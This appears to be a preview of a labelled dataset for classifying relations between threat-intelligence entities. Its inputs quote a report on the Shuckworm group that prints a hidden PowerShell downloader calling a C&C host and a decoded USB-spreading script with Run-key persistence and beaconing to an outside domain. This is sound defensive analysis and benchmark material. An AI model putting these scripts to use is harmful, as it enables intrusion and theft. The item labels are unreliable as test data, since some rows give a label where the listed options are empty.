instruction
stringclasses 4
values | input
stringlengths 47
5.51k
| output
stringclasses 833
values |
---|---|---|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Giddome
### Target Entity: Shuckworm
### Possible Relationship Labels:
[]
### Text Passage:
Shuckworm tactics, techniques, and procedures
Shuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:
* .docx
* .rar (RAR archive files)
* .sfx (self-extracting archives)
* .lnk
* .hta (HTML smuggling files)
The victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.
Once victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.
Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.
Examples of recent scheduled tasks include execution of the following command lines:
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nff
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apk
* wscript.exe "C:\Users\\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
The new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.
Next, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.
In this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, called Telegraph, to store C&C addresses.
Figure 1. Threat actors use Telegraph to store C&C addresses
Shuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.
Symantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.
|
<label>authored-by</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: C&C
### Possible Relationship Labels:
['uses', 'hosts', 'owns', 'compromises', 'is not related to', 'not sure']
### Text Passage:
Shuckworm tactics, techniques, and procedures
Shuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:
* .docx
* .rar (RAR archive files)
* .sfx (self-extracting archives)
* .lnk
* .hta (HTML smuggling files)
The victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.
Once victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.
Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.
Examples of recent scheduled tasks include execution of the following command lines:
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nff
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apk
* wscript.exe "C:\Users\\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
The new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.
Next, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.
In this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, called Telegraph, to store C&C addresses.
Figure 1. Threat actors use Telegraph to store C&C addresses
Shuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.
Symantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.
|
<label>owns</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Pterodo
### Target Entity: C&C
### Possible Relationship Labels:
['beacons-to', 'exfiltrates-to', 'targets', 'uses', 'is not related to', 'not sure']
### Text Passage:
Shuckworm tactics, techniques, and procedures
Shuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:
* .docx
* .rar (RAR archive files)
* .sfx (self-extracting archives)
* .lnk
* .hta (HTML smuggling files)
The victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.
Once victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.
Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.
Examples of recent scheduled tasks include execution of the following command lines:
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nff
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apk
* wscript.exe "C:\Users\\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
The new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.
Next, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.
In this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, called Telegraph, to store C&C addresses.
Figure 1. Threat actors use Telegraph to store C&C addresses
Shuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.
Symantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Giddome
### Target Entity: C&C
### Possible Relationship Labels:
[]
### Text Passage:
Shuckworm tactics, techniques, and procedures
Shuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:
* .docx
* .rar (RAR archive files)
* .sfx (self-extracting archives)
* .lnk
* .hta (HTML smuggling files)
The victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.
Once victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.
Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.
Examples of recent scheduled tasks include execution of the following command lines:
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nff
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apk
* wscript.exe "C:\Users\\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
The new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.
Next, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.
In this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, called Telegraph, to store C&C addresses.
Figure 1. Threat actors use Telegraph to store C&C addresses
Shuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.
Symantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.
|
<label>exfiltrates-to</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Pterodo
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Shuckworm tactics, techniques, and procedures
Shuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:
* .docx
* .rar (RAR archive files)
* .sfx (self-extracting archives)
* .lnk
* .hta (HTML smuggling files)
The victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.
Once victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.
Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.
Examples of recent scheduled tasks include execution of the following command lines:
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nff
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apk
* wscript.exe "C:\Users\\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
The new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.
Next, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.
In this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, called Telegraph, to store C&C addresses.
Figure 1. Threat actors use Telegraph to store C&C addresses
Shuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.
Symantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: Giddome
### Possible Relationship Labels:
[]
### Text Passage:
Shuckworm tactics, techniques, and procedures
Shuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:
* .docx
* .rar (RAR archive files)
* .sfx (self-extracting archives)
* .lnk
* .hta (HTML smuggling files)
The victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.
Once victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.
Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.
Examples of recent scheduled tasks include execution of the following command lines:
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\appdata\local\temp\desert" //e:vbscript //b /dmc /j2k /spl /nff
* CSIDL_SYSTEM\wscript.exe "CSIDL_PROFILE\favorites\jumper.asf" //e:vbscript //b /asf /mdf /nab /apk
* wscript.exe "C:\Users\\[REDACTED]\Contacts\delightful.abk" //e:vbscript //b /cfg /mdm /cfm /mp4
The new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.
Next, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.
In this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, called Telegraph, to store C&C addresses.
Figure 1. Threat actors use Telegraph to store C&C addresses
Shuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.
Symantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
foto.safe
### Target Entity: Shuckworm
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
deprive.wow
### Target Entity: Pterodo
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
_$CHiLdS = GET-ChilDITem $drivE.nAMe_
_foReach($cHilDs IN $chiLDs)_
_{_
_if( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )_
_{_
_sET-lnk $chILds.fUlLName_
_}}_
_IF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){_
_SEt-lNK $DRivE.name_
_}}_
_STArt-SLEeP -S 300;_
_}_
This PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to the PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected machines.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Shuckworm
### Target Entity: PowerShell
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Typical Attack Chain
The following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.
In one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.
After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C&C server:
`"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden "$gt='/get.'+char+char+char;$hosta=char;[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=char;$hosta+=char;$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text"`
More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.
Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.
Next, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:
* CSIDL_SYSTEM\wscript.exe CSIDL_PROFILE\appdata\local\temp\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model
Following this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.
On a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key e.g. "usb-накопитель" translates as "usb-drive".
The foto.safe file is a Base64-encoded script.
Decoded it looks like the following:
_fUNCtIon sET-lnK ($chILd) {_
_$nAMetxt = "foto.sAfe".TolowER();_
_$NAmE = ("кОМПРОМат", "КОРЗиНА", "СеКРетнО" GeT-rAnDOm).ToUPPeR();_
_$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;_
_$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +"\$nAMe.LNK");_
_$shoRtCuT.iConloCaTiON = "C:\wiNDoWS\SysteM32\SHELL32.DLL,3";_
_$SHOrTcUT.TArGetpAth = "c:\wInDOwS\sYstEm32\WInDOwSpowERshell\V1.0\POwERShEll.ExE".ToLoweR();_
_$text = "-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\$NAMetxt OUT-STrIng))".TOlower();_
_$sHORTCUT.ArGUMEnTs = $tExt;_
_$sHortCUT.saVE();_
_$mYfIlE= $chIlD+"\$naMeTXT"_
_cOPY-Item $enV:UsErprOfilE\iNdEx.phP -deSTINAtION $mYfILE_
_$FIlE=GEt-ITEM $mYfiLE -forCe_
_$FiLe.ATtRiButes='hiDDEN'_
__
_}_
_Set-ITemPRoPERTY -pAth HkCU:\soFTWare\MicROsOfT\WiNDows\cURRENtVerSiON\ruN -NAME safE -valUE $env:windir'\sYSTeM32\wINDoWSPowErSHEll\v1.0\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\INdEX.PHp Out-sTRing) poweRSHeLL -noPROfILE';_
_coPy-item .\"fOtO.safe" -dEsTInaTioN $Env:USeRprOFIle\iNdEX.pHp_
_WHile($CoUNT -lE 2){_
_$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';_
_iEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')_
_$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer "drIvETYPe='2'";_
_$Drive.naMe FOreaCH-oBJecT{_
